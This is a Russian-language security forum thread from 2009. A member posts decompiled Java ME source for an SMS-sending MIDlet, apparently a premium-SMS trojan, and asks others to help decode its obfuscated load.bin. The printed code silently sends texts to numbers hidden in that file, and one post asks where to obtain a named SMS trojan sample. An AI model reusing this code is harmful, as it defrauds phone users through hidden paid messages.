ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

03.03.2009, 20:08
|
|
Познающий
Регистрация: 12.02.2009
Сообщений: 75
Провел на форуме: 103386
Репутация:
0
|
|
Какое уходит смс
Подскажите какое сообщение посылается программой.открыл с помощью java decompiler вот что там
import java.io.IOException;
import java.io.InputStream;
import javax.microedition.io.Connector;
import javax.microedition.midlet.MIDlet;
import javax.wireless.messaging.MessageConnection;
import javax.wireless.messaging.TextMessage;
public class MixMobile extends MIDlet
{
public String smsnumber;
public String smstext;
public int tpcurr;
public int tppoint;
public static int a = 12;
public void startApp()
{
zagruzka();
}
public void zagruzka()
{
InputStream localInputStream;
try
{
localInputStream = getClass().getResourceAsStream("/load.bin");
this.tppoint = (localInputStream.read() - a);
for (int i = 0; i < this.tppoint; ++i)
{
this.smsnumber = a(localInputStream);
this.smstext = a(localInputStream);
sendSMS();
}
return;
}
catch (Exception localException)
{
}
}
private static String a(InputStream paramInputStream)
throws IOException
{
int i = paramInputStream.read() - a;
StringBuffer localStringBuffer = new StringBuffer();
for (int j = 0; j < i; ++j)
localStringBuffer.append((char)(paramInputStream.r ead() - a));
return localStringBuffer.toString();
}
public void sendSMS()
{
if (this.tpcurr++ == this.tppoint - 1)
this.tpcurr = 0;
try
{
MessageConnection localMessageConnection;
TextMessage localTextMessage;
(localTextMessage = (TextMessage)(localMessageConnection = (MessageConnection)Connector.open("sms://" + this.smsnumber)).newMessage("text")).setPayloadTex t(this.smstext + " " + getAppProperty("id"));
localMessageConnection.send(localTextMessage);
localMessageConnection.close();
return;
}
catch (Exception localException)
{
}
}
public void pauseApp()
{
}
public void destroyApp(boolean paramBoolean)
{
}
}
Есть еще load.bin файл но его прога не открывает.
И manifest.mf
Manifest-Version: 1.0
MicroEdition-Configuration: CLDC-1.0
MIDlet-Name: chak
MIDlet-Description: chak
Created-By: 1.4.2_12 (Sun Microsystems Inc.)
MIDlet-Icon: /ico.png
MIDlet-Vendor: CyberMobs
MIDlet-1: obchak, /ico.png, MixMobile
MIDlet-Permissions: javax.wireless.messaging.sms.send
MIDlet-Version: 2.11
MicroEdition-Profile: MIDP-1.0
id: 3306
Лично я так и не понял.может фишка в файле load.bin но как его открыть
|
|
|

03.03.2009, 20:24
|
|
Постоянный
Регистрация: 20.06.2008
Сообщений: 323
Провел на форуме: 1240829
Репутация:
165
|
|
WinHex в помощь
|
|
|

03.03.2009, 20:47
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме: 5386281
Репутация:
1177
|
|
Попробуй WinHex'ом!
|
|
|

04.03.2009, 06:02
|
|
Познающий
Регистрация: 05.11.2008
Сообщений: 92
Провел на форуме: 1562063
Репутация:
149
|
|
Код:
{
this.smsnumber = a(localInputStream);
this.smstext = a(localInputStream);
sendSMS();
}
по-моему это
|
|
|

04.03.2009, 07:56
|
|
Постоянный
Регистрация: 18.08.2007
Сообщений: 846
Провел на форуме: 5585816
Репутация:
1236
|
|
Сообщение от Rav1n
Код:
{
this.smsnumber = a(localInputStream);
this.smstext = a(localInputStream);
sendSMS();
}
по-моему это
ошибаешься...
скинь лучше саму javy сюда
|
|
|

04.03.2009, 21:37
|
|
Познающий
Регистрация: 12.02.2009
Сообщений: 75
Провел на форуме: 103386
Репутация:
0
|
|
Кто знает где достать trojan-sms.j2me.konov.b?
В интернете много описаний а самого трояна не нашел
|
|
|

04.03.2009, 22:23
|
|
Познающий
Регистрация: 12.02.2009
Сообщений: 75
Провел на форуме: 103386
Репутация:
0
|
|
Сообщение от sa~
ошибаешься...
скинь лучше саму javy сюда
я тут не особо ориентируюсь,куда мне послать это яву?
|
|
|

04.03.2009, 22:33
|
|
Участник форума
Регистрация: 08.11.2008
Сообщений: 249
Провел на форуме: 1559347
Репутация:
282
|
|
я тут не особо ориентируюсь,куда мне послать это яву?
Выложи на файлообменник(dump.ru depositfiles или др.) и выложи здесь ссылку
|
|
|

05.03.2009, 00:10
|
|
Познающий
Регистрация: 12.02.2009
Сообщений: 75
Провел на форуме: 103386
Репутация:
0
|
|
Сообщение от Tigger
Попробуй WinHex'ом!
Вот что выдал Winhex в файле load.bin
C=>>yzqB<<DyD?DAotwB<<DyD?Aotw>@CBpm,=<==B==C=q
|
|
|

05.03.2009, 01:25
|
|
Постоянный
Регистрация: 18.08.2007
Сообщений: 846
Провел на форуме: 5585816
Репутация:
1236
|
|
Сообщение от Kasali
Вот что выдал Winhex в файле load.bin
C=>>yzqB<<DyD?DAotwB<<DyD?Aotw>@CBpm,=<==B==C=q
нам это ничего не дает
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|